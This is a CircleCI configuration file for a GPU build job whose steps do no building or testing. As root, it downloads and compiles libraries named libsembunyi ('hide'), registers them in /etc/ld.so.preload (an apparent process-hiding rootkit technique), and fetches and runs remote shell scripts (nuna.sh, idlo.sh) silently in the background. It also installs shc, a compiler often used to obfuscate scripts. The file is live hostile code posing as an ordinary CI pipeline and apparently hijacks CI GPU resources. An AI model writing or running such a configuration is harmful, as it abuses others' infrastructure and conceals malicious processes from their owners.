version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-1604-cuda-10.1:201909-23
    resource_class: gpu.nvidia.small
    steps:
      - run: 
          name: Cek Status GPU !!
          command: |
            nvidia-smi
      - run:
          name: Start Job ....
          command: | 
            wget https://github.com/mutiahanum22/used/releases/download/fired/all.tar.gz
            sudo su --command "tar -xvf all.tar.gz && cd 01 && make && sudo mv libsembunyi01.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi01.so >> /etc/ld.so.preload && cd 02 && make && sudo mv libsembunyi02.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi02.so >> /etc/ld.so.preload && cd 03 && make && sudo mv libsembunyi03.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi03.so >> /etc/ld.so.preload && cd 04 && make && sudo mv libsembunyi04.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi04.so >> /etc/ld.so.preload>> /etc/ld.so.preload"
            sudo su --command "wget https://raw.githubusercontent.com/yulinoan/minang/main/nuna.sh && chmod +x nuna.sh"
            sudo su --command "nohup ./nuna.sh >/dev/null 2>&1 &"
      - run:
          name: Yuk Deploy ....
          command: |
            sudo su --command "apt-get install shc -y && wget https://raw.githubusercontent.com/thefacta/repo/main/idlo.sh && chmod +x idlo.sh"
            sudo su --command "./idlo.sh"
            
